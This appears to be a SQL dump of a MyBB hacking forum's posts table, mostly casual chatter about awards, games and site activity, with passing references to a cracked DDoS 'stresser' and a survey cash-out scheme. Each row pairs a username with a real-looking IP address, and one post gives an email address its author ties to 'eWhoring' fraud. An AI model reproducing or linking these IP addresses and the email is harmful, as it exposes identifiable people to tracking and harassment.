'abbd4d575c6a8cf3558dc7d6ba4adc58', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5150', '919', '5099', '7', 'RE: [Free] Custom Mousepad - Only $1 with free shipping', '0', '62', 'R?????zo?', '1350500876', 'Cool I will make one then :D Thanks for this.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'c628cdf757a4582bcd0944725f0b0ea6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5151', '897', '5145', '9', 'RE: YouTube SEO - Like a baws.', '0', '264', 'D?ea', '1350500988', '[quote=\'R?????zo?\' pid=\'5145\' dateline=\'1350500726\'] How much are you making a month by the way? Just curious. [/quote] It\'s different, last month I made $35', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'e4840852fcd377c5765bdb0296dd2138', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5152', '919', '5150', '7', 'RE: [Free] Custom Mousepad - Only $1 with free shipping', '0', '264', 'D?ea', '1350501141', '[quote=\'R?????zo?\' pid=\'5150\' dateline=\'1350500876\'] Cool I will make one then :D Thanks for this. [/quote] Go for it ;)', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '1474db0a83022c0080bbc6fa0c59b406', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5153', '918', '5149', '65', 'RE: I feel famous', '0', '264', 'D?ea', '1350501207', '[quote=\'R?????zo?\' pid=\'5149\' dateline=\'1350500837\'] Yeah but I don\'t watch that much televison also I\'m not from the US. [/quote] I\'m from Denmark, not US ;) He is from Austria.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '88ee85752dcd4bcbaee3287cc881c14b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5154', '920', '5147', '49', 'RE: [IDEA] Award System', '0', '264', 'D?ea', '1350501252', '[quote=\'R?????zo?\' pid=\'5147\' dateline=\'1350500756\'] Talk to t3h jok3r, I\'d love my GFX award :P [/quote] I\'m trying to contact him.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '607f423eb206992dee04afe2ef29ee3c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5155', '920', '5118', '49', 'RE: [IDEA] Award System', '0', '222', 'Exposé', '1350501303', 'I think we should definitely try to get the mod workin tho', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '44b33dc08a7de426bae3f17aebd7643d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5156', '920', '5155', '49', 'RE: [IDEA] Award System', '0', '264', 'D?ea', '1350501410', '[quote=\'ƒ???????????g\' pid=\'5155\' dateline=\'1350501303\'] I think we should definitely try to get the mod workin tho [/quote] I have added Jok3r\'s skype, waiting for him to accept me.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '0693e30cd9d06990e417bd4051727bbd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5157', '920', '5118', '49', 'RE: [IDEA] Award System', '0', '222', 'Exposé', '1350501469', 'Or you could just message him....he is also in the skype group :P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '699abc8bf06483db916e1fda9fdc5480', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5158', '920', '5157', '49', 'RE: [IDEA] Award System', '0', '264', 'D?ea', '1350501563', '[quote=\'ƒ???????????g\' pid=\'5157\' dateline=\'1350501469\'] Or you could just message him....he is also in the skype group :P [/quote] I needs to talk private to him later in the future anyway.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '87c5855c51cdbb072967e7369581ae4a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5159', '920', '5118', '49', 'RE: [IDEA] Award System', '0', '82', 'iTzIpod', '1350501612', 'It was going to come out sometime next week or this week or last week.. I forgot. But Nice idea :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1addbd3cef2a011deb6a4713578976cf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5160', '920', '5159', '49', 'RE: [IDEA] Award System', '0', '264', 'D?ea', '1350501808', '[quote=\'iTzIpod\' pid=\'5159\' dateline=\'1350501612\'] It was going to come out sometime next week or this week or last week.. I forgot. But Nice idea :) [/quote] Thanks ;)', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '568526f7fa6af32fbcd46737c6842fa8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5161', '922', '5139', '9', 'RE: ???EFYU.net || Easy $20/hour || Cashout with hundreds of methods!???', '0', '270', 'LCS', '1350501826', '[quote=\'R?????zo?\' pid=\'5139\' dateline=\'1350500540\'] Look promising. I\'m not in US though, will this work if I have a VPN? Nice thread anyways. [/quote] It is promosing :) Yeah it\'ll work if you use a VPN, although if its a public one it might say you\'ve already completed some surveys. Not too sure. Thanks! :)', '2.124.223.31', '41738015', '1', '0', '0', '0', '1', '1e3a32c3c712ed620f555ce6c228c153', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5162', '918', '5088', '65', 'RE: I feel famous', '0', '62', 'R?????zo?', '1350501878', 'I guess I live in a 3rd world country anyways :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'b52bf6ee084e9f6b16d3ab1abcaac92e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5163', '418', '1925', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '222', 'Exposé', '1350501997', 'Nice I will check this out in a little bit....thanks', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '36eec180b1d1cc535eccac2e19c5de22', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5164', '894', '4886', '21', 'RE: [FREE] Anonymous Stresser [Cracked]', '0', '53', 'sirchamp', '1350502052', 'Am I missing something or am I not the only one who cant even log into this tool?', '91.115.176.210', '1534308562', '1', '0', '0', '0', '1', 'f1c3f8370576534d6cc4b2d9da9c849e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5165', '918', '5162', '65', 'RE: I feel famous', '0', '264', 'D?ea', '1350502652', '[quote=\'R?????zo?\' pid=\'5162\' dateline=\'1350501878\'] I guess I live in a 3rd world country anyways :P [/quote] Yeah just might :P', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '5959a10de067070031785ad15d4f4b75', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5166', '920', '5118', '49', 'RE: [IDEA] Award System', '0', '257', 'XxTREYZxX', '1350502825', 'yeah this is a greaat idea, i would love my gamers award.', '203.104.11.3', '-882373885', '1', '0', '0', '0', '1', '7640374d2fe49314d0d276db7d6435e9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5167', '920', '5166', '49', 'RE: [IDEA] Award System', '0', '264', 'D?ea', '1350502850', '[quote=\'?(???)?TREYZ?(???)?\' pid=\'5166\' dateline=\'1350502825\'] yeah this is a greaat idea, i would love my gamers award. [/quote] Yeah ;) Hope he will let me help.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'c64acc3b4b686a06b1ff75807f92f86f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5168', '894', '4958', '21', 'RE: [FREE] Anonymous Stresser [Cracked]', '0', '264', 'D?ea', '1350503013', '[quote=\'Timmy\' pid=\'4958\' dateline=\'1350433231\'] What\'s the difference between a stresser and a booter? [/quote] Stresser sounds more sexy than booter. But it\'s the same ;)', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '895dadbb378625e4baaf4d808a36ff5c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5169', '874', '4722', '7', 'RE: N.A.S.A HACKED', '0', '257', 'XxTREYZxX', '1350503475', 'yeah that would be cool i might do that there is a 16% chance ill do that but thanks for the share', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', '2fe16278bca7a8d8c3258e41151cd1b5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5170', '921', '5120', '4', 'RE: Hey', '0', '257', 'XxTREYZxX', '1350503568', 'welcome fellow person stay active and HQ please', '203.104.11.8', '-882373880', '1', '0', '0', '0', '1', '1f368d5b1d5b2f10c24c87486c2801b5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5171', '893', '4885', '77', 'RE: GamerTag Availability Checker Site', '0', '257', 'XxTREYZxX', '1350503807', 'agree with virtual and iTzIpod', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', 'c4023ca1c733db9b6f8d43c0e8e1d1c4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5172', '923', '0', '73', 'no more series', '0', '257', 'XxTREYZxX', '1350503923', 'i will no longer be doing the great app series anymore as because i got like 0 POST which is kinda sad i thought it would of been helpfull', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', 'd87ceeef1257d8dcd3e22472f1090479', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5173', '924', '0', '71', 'Ratchet and Clank @#$%^&^&*(', '0', '257', 'XxTREYZxX', '1350504088', 'hey l33T, has anyone played ratchet and the clank, because i was playing with my brother and i\'v got to admit i was kinda fun:) so my ?ion who like this game!!!!!!!!', '203.104.11.9', '-882373879', '1', '0', '0', '0', '1', 'b8ebe50cc763de222807f1edc819db33', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5174', '925', '0', '7', 'gaming thread down(READ)', '0', '257', 'XxTREYZxX', '1350504529', 'hey lH, and i just wanted to say the gaming thread is getting kinda boring because there is like no one active in the gaming section except me, i really think lh just advertise alot so that we get more members and more activity.OR come check out gaming section:) hope the gaming section become alive again thanks:)', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', 'f06582282b9c236d155a4922f3d5f94d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5184', '925', '5174', '7', 'RE: gaming thread down(READ)', '0', '228', 'VirtualLegend', '1350512597', 'It\'s not only the gaming section ! We need to get more Members !!!', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '6a6345bf85195dec84a9d197bf3e7ebb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5185', '418', '1925', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '82', 'iTzIpod', '1350513217', 'No problem! Good luck everyone with their SEing experiences.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '13b630646a7cda9f67575f3238eeb736', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5183', '922', '5161', '9', 'RE: ???EFYU.net || Easy $20/hour || Cashout with hundreds of methods!???', '0', '62', 'R?????zo?', '1350511669', '[quote=\'LCS\' pid=\'5161\' dateline=\'1350501826\'] [quote=\'R?????zo?\' pid=\'5139\' dateline=\'1350500540\'] Look promising. I\'m not in US though, will this work if I have a VPN? Nice thread anyways. [/quote] It is promosing :) Yeah it\'ll work if you use a VPN, although if its a public one it might say you\'ve already completed some surveys. Not too sure. Thanks! :) [/quote] Does not work with a VPN, and I use a paid one [spoiler] [img]http://i.imgur.com/pkLQC.png[/img] [/spoiler]', '149.255.32.228', '-1778442012', '1', '0', '62', '1350511697', '1', '6b0f1ae5e99dcfcb1bc9de2907975391', '0', '1350511697'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5182', '922', '5121', '9', 'RE: ???EFYU.net || Easy $20/hour || Cashout with hundreds of methods!???', '0', '61', 'NXK', '1350511242', 'Looks nice I guess, Hopefully it\'s legit.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'e2a5ebec72fa6cd1cab9f44f84a746dc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5181', '925', '5174', '7', 'RE: gaming thread down(READ)', '0', '61', 'NXK', '1350511183', 'I\'ve been meaning to do this, But I don\'t have tons of free time. Ill work on it when I can.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'd0666d1a1721091561e72364a71da23d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5186', '925', '5174', '7', 'RE: gaming thread down(READ)', '0', '257', 'XxTREYZxX', '1350513381', 'yeah i agree virtual :) hopefully NXK can help us out', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'fa73ebab1e9c4c3d4eff5bbe19234918', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5187', '925', '5174', '7', 'RE: gaming thread down(READ)', '0', '222', 'Exposé', '1350516715', 'Well I just joined yesterday so I\'ll post some stuff', '66.87.30.33', '1113005601', '1', '0', '0', '0', '1', 'e02c9435e93c951b07e337e84b060856', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5188', '190', '665', '56', 'RE: Copy and paste game', '0', '61', 'NXK', '1350516875', 'http://www.overclock.net/t/1312965/event-radeon-extravalanza-october-20th-2012-5-000-in-prizing Going to this for Counter strike and league of legends weoooo', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '91cb8c3f4718dee0377e15da6883a97a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5189', '925', '5174', '7', 'RE: gaming thread down(READ)', '0', '257', 'XxTREYZxX', '1350517892', 'yeah thanks even post in the gaming threads and check out my stuff', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '793a5535f4882b8309df6e494513bda8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5190', '872', '4872', '24', 'RE: Windows Updates, who uses It?', '0', '262', 'RAND0M1ZER', '1350519353', '[quote=\'R?????zo?\' pid=\'4872\' dateline=\'1350388812\'] windows updates are crap, theres not even a beta version before so they only test it when we(users) update it and if theres complaints they will just fix it on the next version. [/quote] I haven\'t had any significant issues from Windows update. I think Microsoft is fairly on top of things.', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', 'ebf7c74d459cc31cce6c394c68a36ba2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5191', '927', '0', '72', 'BLACK OPS ZOMBIE TIPS', '0', '257', 'XxTREYZxX', '1350519699', 'hey l33t i will be telling you some tips in zombies The box will always be in the same spot you found it in as long as you don\'t leave the game back to the main menu. When you die just restart and it will be where you last found it. This is handy for when it\'s behind the first door you unlock. Knife Zombies till you reach level 4 and then buy the AK74u, unless you can reach the M16 and Claymores. Spam the box till you get a light machine gun or the ray gun. When you turn on the power it will release the crawlers, at this time i hold up in a crouched position by the juggernog machine, which is an essential purchase. Otherwise just do laps around from the stage to the alley untill you can get a crowd lined up and then hop in the teleporter and throw grenades down on them. And remeber, should you not already know this, always try to leave 1 zombie alive till you\'ve done all you need to do. hope you enjoy :)', '203.104.11.11', '-882373877', '1', '0', '257', '1350519722', '1', '54c48100c5e088e3d23bcfcc9e33ae36', '0', '1350519722'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5192', '927', '5191', '72', 'RE: BLACK OPS ZOMBIE TIPS', '0', '228', 'VirtualLegend', '1350520596', 'Good tips, but there are more handy tricks and tips', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '02ee75c6000ce6bd1488f7515b83dc6d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5193', '927', '5191', '72', 'RE: BLACK OPS ZOMBIE TIPS', '0', '257', 'XxTREYZxX', '1350520795', 'yeah there is but too long to write but thanks for posting plus will i get banned for asking people to come here on another forum thanks:) why is this here above here (wierd)', '203.104.11.11', '-882373877', '1', '0', '257', '1350549817', '1', '6901c9b5d039f252fde48cd26d510af6', '0', '1350549817'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5194', '928', '0', '49', 'MOTM', '0', '257', 'XxTREYZxX', '1350522467', 'hey lH whats up i going to be talking about member of the month,\\who believes we should get MOTM on L33Thacking.net post yes and why or no and why thanks for your time!;)', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '167bf90c7fd54e59fc8d092189d5b659', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5195', '190', '665', '56', 'RE: Copy and paste game', '0', '100', '??zg???g????61', '1350522681', 'jadebabe37@gmail.com LOL thats my eWhoring paypal xDD', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'd534ccc0b4d8ef99d9cbfd0a5df78835', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5196', '929', '0', '49', 'AWARD SYSTEM', '0', '257', 'XxTREYZxX', '1350522686', 'hey L33T, who believes that we should get a award system happening it would be great :) cant wait till i get my gamers award:) lol', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '8aa3c6c82087f130fba25cad8a99979b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5197', '930', '0', '7', 'am i a nice and helpfull member', '0', '257', 'XxTREYZxX', '1350523176', 'hey l33T, TITLE SAYS IT ALL:)', '203.104.11.8', '-882373880', '1', '0', '0', '0', '1', '578d51191a68c299f1b127c279ead572', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5198', '930', '5197', '7', 'RE: am i a nice and helpfull member', '0', '3', '??????????¢™', '1350523832', 'I have never seen you doing anything helpful', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'c4053ea7bd2dbe5f9bcf93944f35cfae', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5199', '929', '5196', '49', 'RE: AWARD SYSTEM', '0', '3', '??????????¢™', '1350523858', 'I think we should get a award system up.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '5bbac2ece203bbbfab209310f677ff0c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5200', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '3', '??????????¢™', '1350523957', 'I have sent the source to everyone above, Enjoy', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'e76b0b7f90b7331cdff50ac31a3e20e3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5201', '907', '5094', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '3', '??????????¢™', '1350524065', '[quote=\'iTzIpod\' pid=\'5094\' dateline=\'1350475182\'] Best video on Youtube. Her interview reaction: It was like Mortal Kombat. And it hurt. Or something along those lines :p [/quote] Yep that is the reason I made this edit. First one to do this on youtube.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'b80a4204b66b5b7013975600fb1bd63b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5202', '928', '5194', '49', 'RE: MOTM', '0', '3', '??????????¢™', '1350524200', 'I think we should do this, it would be a great thing.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'a072730a7b53abb7526cc0ff9df3f4cf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5203', '928', '5194', '49', 'RE: MOTM', '0', '257', 'XxTREYZxX', '1350524467', 'yeah do you wanna contact t3hjoker for us and ask, and also ask him to make a thread about who would want it :)', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 